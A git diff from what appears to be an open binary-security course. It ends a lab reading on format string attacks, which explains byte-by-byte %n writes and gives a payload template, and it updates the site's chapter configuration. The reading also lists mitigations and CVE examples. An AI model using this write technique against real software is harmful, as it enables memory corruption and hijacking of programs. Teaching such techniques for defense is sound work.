+We use the 4 adjacent adressess to write byte by byte and use overflows to reach a lower value for the next byte. +For example, after writing `0xa6` we can write `0x0191`: + +![Write Bytes](https://ocw.cs.pub.ro/courses/_media/cns/labs/bytes_write.png) + +Also, the `%n` count doesn\'t reset so, if we want to write `0xa6` and then `0x91` the payload should be in the form of `<0xa6 bytes>%n<0x100 - 0xa6 + 0x91 bytes>%n`. + +As mentioned earlier above, instead writing N bytes `“A” * N` you can use other format strings like `%Nc` or `%Nx` to keep the payload shorter. + +**Bonus task** Can you get a shell? +(Assume ASLR is disabled). + +### Mitigation and Recommendations + +1. Manage the string length carefully. +1. Don't use `gets`. + With `gets` there is no way of knowing how much data was read +1. Use string functions with `n` parameter, whenever a non constant string is involved, i.e. `strnprintf`, `strncat`. +1. Make sure that the `NUL` byte is added, for instance `strncpy` does **not** add a `NUL` byte. +1. Use `wcstr*` functions when dealing with wide char strings. +1. Don't trust the user! + +### Real life Examples + +- [Heartbleed](http://xkcd.com/1354/) + Linux kernel through 3.9.4 [CVE-2013-2851](http://www.cvedetails.com/cve/CVE-2013-2851/) + The fix is [here](https://lore.kernel.org/all/1370649055-12830-2-git-send-email-keescook@chromium.org/). + More details [here](http://www.intelligentexploit.com/view-details-ascii.html?id=16609). + +- Windows 7 [CVE-2012-1851](http://www.cvedetails.com/cve/CVE-2012-1851/) + +- Pidgin off the record plugin [CVE-2012-2369](http://www.cvedetails.com/cve/CVE-2012-2369). + The fix is [here](https://bugzilla.novell.com/show_bug.cgi?id=762498#c1) + +## Resources + +- [Secure Coding in C and C++](http://www.cert.org/books/secure-coding/) +- [String representation in C](http://www.informit.com/articles/article.aspx?p=2036582) +- [Improper string length checking](https://www.owasp.org/index.php/Improper_string_length_checking) +- [Format String definition](http://cwe.mitre.org/data/definitions/134.html) +- [Format String Attack (OWASP)](https://www.owasp.org/index.php/Format_string_attack) +- [Format String Attack (webappsec)](http://projects.webappsec.org/w/page/13246926/Format%20String) +- [strlcpy and strlcat - consistent, safe, string copy and concatenation.](http://www.gratisoft.us/todd/papers/strlcpy.html): This resource is useful to understand some of the string manipulation problems. diff --git a/config.yaml b/config.yaml index ee5d903..67e49de 100644 --- a/config.yaml +++ b/config.yaml @@ -1,3 +1,4 @@ +--- stages: - make_assets - embed_reveal @@ -25,8 +26,8 @@ embed_reveal: target: docusaurus extension: mdx build: - Exploration-tools: Exploration-tools - Executables-and-processes: Executable-and-processes + Exploration-Tools: Exploration-Tools + Executables-and-Processes: Executables-and-Processes Static-Analysis: Static-Analysis Dynamic-Analysis: Dynamic-Analysis @@ -38,39 +39,106 @@ docusaurus: structure: - Introduction: chapters/README.md - Binary Analysis: - - Overview: chapters/binary-analysis/overview/README.md + - Exploration Tools: + path: chapters/binary-analysis/exploration-tools + extra: + - media/ + subsections: + - Reading/: reading/ + - Slides: /build/embed_reveal/Exploration-Tools + - Executables and Processes: + path: chapters/binary-analysis/executables-and-processes + extra: + - media/ + subsections: + - Reading/: reading/ + - Drills: + path: drills + subsections: + - Matryoshka/: 06-challenge-matryoshka/ + - Slides: /build/embed_reveal/Executables-and-Processes - Static Analysis: - path: chapters/binary-analysis/static-analysis/ + path: chapters/binary-analysis/static-analysis extra: - media/ subsections: - Reading/: reading/ - Drills: - path: drills/ + path: drills subsections: - Crypto Crackme/: 04-challenge-crypto-crackme/ - Broken/: 05-challenge-broken/ - Hyp3rs3rv3r/: 06-challenge-hyp3rs3rv3r/ - Demos: - path: demos/ + path: demos subsections: - Disassemble Methods/: 01-tutorial-disassemble-methods/ - - IDA time/: 02-tutorial-ida-time/ + - IDA Time/: 02-tutorial-ida-time/ - CPP Executables/: 03-tutorial-cpp-executables/ - - Slides: /build/embed_reveal/Static-Analysis - - - Exploitation Techniques: chapters/README.md - - Mitigations and Defensive Strategies: chapters/README.md - + - Dynamic Analysis: + path: chapters/binary-analysis/dynamic-analysis + subsections: + - Reading/: reading/ + - Slides: /build/embed_reveal/Dynamic-Analysis + - Exploitation Techniques: + - Buffer Exploitation: + extra: + - media/ + path: chapters/exploitation-techniques/buffer-exploitation + subsections: + - Reading/: reading/ + - Shellcodes: + extra: + - media/ + path: chapters/exploitation-techniques/shellcodes + subsections: + - Reading/: reading/ + - Shellcodes Advanced: + path: chapters/exploitation-techniques/shellcodes-advanced + subsections: + - Reading/: reading/ + - Return-Oriented Programming: + extra: + - media/ + path: chapters/exploitation-techniques/return-oriented-programming + subsections: + - Reading/: reading/ + - Return-Oriented Programming Advanced: + path: chapters/exploitation-techniques/return-oriented-programming-advanced + subsections: + - Reading/: reading/ + - Mitigation and Defensive Strategies: + - Defense Mechanisms: + path: chapters/mitigations-and-defensive-strategies/defense-mechanisms + subsections: + - Reading/: reading/ + - Information Leaks: + path: chapters/mitigations-and-defensive-strategies/information-leaks + subsections: + - Reading/: reading/ + - Bypassing Mitigations: + path: chapters/mitigations-and-defensive-strategies/bypassing-mitigations + subsections: + - Drills: + path: drills + subsections: + - Tutorial Bypass/: 03-tutorial-bypass-dep-no-aslr-libc/ + - Challenge Bypass No ASLR/: 08-challenge-bypass-dep-no-aslr-libc/ + - Challenge Bypass ASLR/: 09-challenge-bypass-dep-aslr-libc/ + - Extra: + - Pwntool Intro: + path: chapters/extra/pwntools-intro + subsections: + - Reading/: reading/ static_assets: - - Exploration-tools: /build/make_assets/chapters/binary-analysis/exploration-tools/slides/_site - - Executables-and-processes: /build/make_assets/chapters/binary-analysis/executables-and-processes/slides/_site + - Exploration-Tools: /build/make_assets/chapters/binary-analysis/exploration-tools/slides/_site + - Executables-and-Processes: /build/make_assets/chapters/binary-analysis/executables-and-processes/slides/_site - Static-Analysis: /build/make_assets/chapters/binary-analysis/static-analysis/slides/_site - Dynamic-Analysis: /build/make_assets/chapters/binary-analysis/dynamic-analysis/slides/_site config_meta: title: Binary Security - url: http://open-education-hub.github.io/binary-security/ + url: http://open-education-hub.github.io baseUrl: /binary-security/ onBrokenLinks: warn onBrokenMarkdownLinks: warn